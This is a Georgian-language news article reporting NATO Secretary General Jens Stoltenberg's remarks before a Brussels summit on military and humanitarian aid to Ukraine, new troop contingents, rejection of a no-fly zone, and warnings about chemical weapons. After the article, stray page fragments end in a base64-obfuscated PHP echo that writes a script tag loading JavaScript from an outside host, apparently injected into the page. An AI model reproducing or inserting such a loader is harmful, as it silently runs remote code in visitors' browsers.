celsiusi
ავერსი საქკაბელი
ბრიუსელში მსოფლიო ლიდერები უკვე მივიდნენ. NATO-ს შტაბბინაში სამიტის დაწყებამდე გაკეთდა განცხადებები. NATO-ს გენერალურმა მდივანმა იენს სტოლტენბერგმა უკვე გააკეთა კომენტარი მედიისთვის, მან განაცხადა, რომ NATO მოახდენს უკრაინის მხარდაჭერის ირგვლივ ფოკუსირებას, თუ როგორ გაუწიოს მეტი სამხედრო, ჰუმანიტარული დახმარება, რომ უკრაინამ თავად შეძლოს რუსეთთან გამკლავება.
 
"ჩვენ ერთად უნდა ვუპასუხოთ ამ კრიზისს. დღის წესრიგშია საკითხები უკრაინის, NATO-ს და საერთაშორისო დღის წესრიგის შესახებ. დღეს ჩვენ ლიდერებს სიტყვით მიმართავს პრეზიდენტი ზელენსკი. ჩვენ მოვახდენთ უკრაინის მხარდაჭერის ირგვლივ ფოკუსირებას, თუ როგორ გავუწიოთ მეტი სამხედრო, ჰუმანიტარული დახმარება უკრაინას რომ ქვეყანამა თავად შეძლოს რუსეთთან გამკლავება.
 
მნიშვნელოვანია, რომ NATO-მ თავდაცვის დღის წესრიგი განაახლოს და ეს იყო ხანგრძლივვადიანი. სამხედროები ახალი კონტიგენტი დაემატება 4 მიმართულებით, მათ შორის არის სლოვაკეთი, ბულგარეთი, უნგრეთი. ჩვენ უნდა მოვახდინოთ მეტი ფინანსური ინვესტიციების მოზიდვა თავდაცვის მიმართულებით. ამის ჩვენმა მოკავშირეებმა უკვე სურვილიც გამოთქვეს, რაც სასიხარულოა.
 
პრეზიდენტმა პუტინმა დიდი შეცდომა დაუშვა როდესაც სუვერენულ სახელმწიფოში ფართომასშტაბიანი ომი წამოიწყო. მან ვერ გათვალა უკრაინელი სამხედროების ძალა. ისინი დიდი წინააღმდეგობას შეეჯახნენ, იმაზე დიდის ვიდრე ელოდნენ. NATO-ს მოკავშირეებმა დიდი მხარდაჭერა გამოხატეს, უკრაინაში ათობით ათასი ჯარისკაცი გავწვრთენით. უკრაინელი სამხედროები ახლა მეტად გაწვრთნილი და აღჭურვილია ვიდრე ეს 2014 წელს იყო. ჩვენ ვთქვით რომ უკრაინაში ვერ განლაგდება ჩვენი სამხედროები და უკრაინის ცაზე ვერ იფრენს ჩვენი თვითმფრინავები. ვერ დავუშვებთ, რომ მოხდეს მეტი ესკალაცია, მეტი დესტრუქცია და მეტი ადამიანის ტანჯვა. არასაფრენი ზონის გამოცხადება რუსეთის თვითმფრინავებზე მასიურ თავდასხმას ნიშნავს. ჩვენ არ ვსპეკულირებთ როცა ვაცხადებთ, რომ თუ რუსეთი ქიმიურ იარაღს გამოიყენებს, ეს სიტუაციის და გარემოებებს შეცვლის. ამას მოჰყვება მძიმე შედეგები. ეს იქნება საერთაშორისო სამართლის დარღვევა, ჩვენ არ ვსპეკულირებთ, რომ NATO მზადა დაიცვას NATO-ს წევრი ქვეყნები.
 
მოვუწოდებ ჩინეთს, შეუერთდეს მსოფლიოს და დაგმოს უკრაინაში რუსეთის შეჭრა, ნუ უზრუნველყოფს მოსკოვს პოლიტიკური, ან სხვა რაიმე სახის დახმარებით. NATO​ უპრეცედენტო სანქციებს უწესებს რუსეთს და უპრეცედენტოდ ვეხმარებით უკრაინას," - განაცხადა სტოლტენბერგმა.
906
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");